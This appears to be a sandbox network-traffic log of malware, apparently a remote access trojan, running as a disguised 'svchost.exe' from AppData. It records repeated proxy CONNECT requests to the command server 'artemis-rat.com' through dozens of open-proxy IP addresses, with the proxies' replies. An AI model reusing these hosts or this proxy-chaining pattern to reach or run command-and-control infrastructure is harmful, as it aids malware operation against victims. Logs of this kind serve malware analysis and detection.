Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3512	192.168.2.5	60815	222.138.76.6	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.910621881 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3513	192.168.2.5	57433	193.30.13.13	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.918766975 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3514	192.168.2.5	57274	51.15.142.4	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.934386969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3515	192.168.2.5	61091	18.135.133.116	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.939485073 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.307246923 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:37 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:37.456065893 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 ac fb 8c 99 da 7b 3a 5b e6 55 82 dd 49 fc 59 01 27 e8 35 1a 36 04 b6 5a 93 d5 56 f3 8c 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eR{:[UIY'56ZV*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:37.759254932 CET	536	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 e5 42 3d c5 ee 83 2f ad 1d 30 cf d4 5a e6 30 75 bb c6 a6 62 bd d7 d0 9f 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9B=/0Z0ubDOWNGRD0000H010Uartemis-rat.com0240309112140Z260309112140Z010Uartemis-rat.com0"0H0_9Q
Mar 9, 2024 13:14:37.759407043 CET	536	IN	Data Raw: 0f fa 08 18 4c fe 64 12 dd 31 cc e3 20 6a d4 dd 4e 90 c1 cb 8a a5 af de 21 13 8f 1c f8 7f 94 a4 d2 e9 f0 87 be a3 48 8e 21 6a 74 44 c0 8b b4 a6 47 cf d5 07 dc 22 cc e0 8d ef 2b d8 78 c0 bf a3 6c bf aa c2 47 47 bf 31 78 24 88 1c 40 19 a7 89 6d 22 Data Ascii: Ld1 jN!H!jtDG"+xlGG1x$@m"g2CYZA9Rz(.K`3ty0qGGU#Q.`d&6(;*%rgKy3H4$ho4NwC,(
Mar 9, 2024 13:14:37.759424925 CET	7	IN	Data Raw: 03 00 04 0e 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3516	192.168.2.5	61067	51.15.132.215	16379	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.939518929 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3517	192.168.2.5	61034	46.17.63.166	9091	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.939642906 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3518	192.168.2.5	61151	43.153.22.29	10005	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.939719915 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.113203049 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:37.113607883 CET	160	IN	HTTP/1.1 401 UnauthorizedContent-Type: text/plain; charset=utf-8WWW-Authenticate: Basic realm="proxy"errorMsg: The IP specified by the port is not availabl Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3519	192.168.2.5	61001	62.171.131.101	37447	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.939800978 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.677349091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.880604982 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3520	192.168.2.5	61033	34.95.243.122	8081	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.939843893 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3521	192.168.2.5	61181	104.21.194.19	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.940175056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.094532967 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3522	192.168.2.5	61035	198.105.111.15	6693	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.940239906 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.230370998 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3523	192.168.2.5	57454	198.57.211.235	11096	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.945645094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.474098921 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3524	192.168.2.5	61032	101.133.162.23	8899	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.948544979 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.646099091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.646693945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3525	192.168.2.5	61215	104.16.106.65	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.959602118 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.113854885 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3526	192.168.2.5	61068	193.239.58.92	8081	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.959716082 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3527	192.168.2.5	61224	104.25.230.252	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.961838007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.115820885 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3528	192.168.2.5	61234	104.19.225.70	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.966211081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.120471954 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3529	192.168.2.5	61235	172.67.181.136	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.966922998 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.121201992 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3530	192.168.2.5	61029	171.250.222.13	1080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.971965075 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3531	192.168.2.5	61110	128.140.26.12	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.972109079 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3532	192.168.2.5	61069	185.101.16.52	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.972470999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3533	192.168.2.5	61063	203.154.39.146	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.984179020 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.833338022 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3534	192.168.2.5	60899	120.26.0.11	8880	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.984693050 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.329854965 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3535	192.168.2.5	61257	104.20.233.70	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.985913038 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.140393972 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3536	192.168.2.5	57567	109.86.182.203	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.995126963 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3537	192.168.2.5	61218	52.13.248.29	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.995327950 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.186242104 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:37 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3538	192.168.2.5	61268	45.12.31.3	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
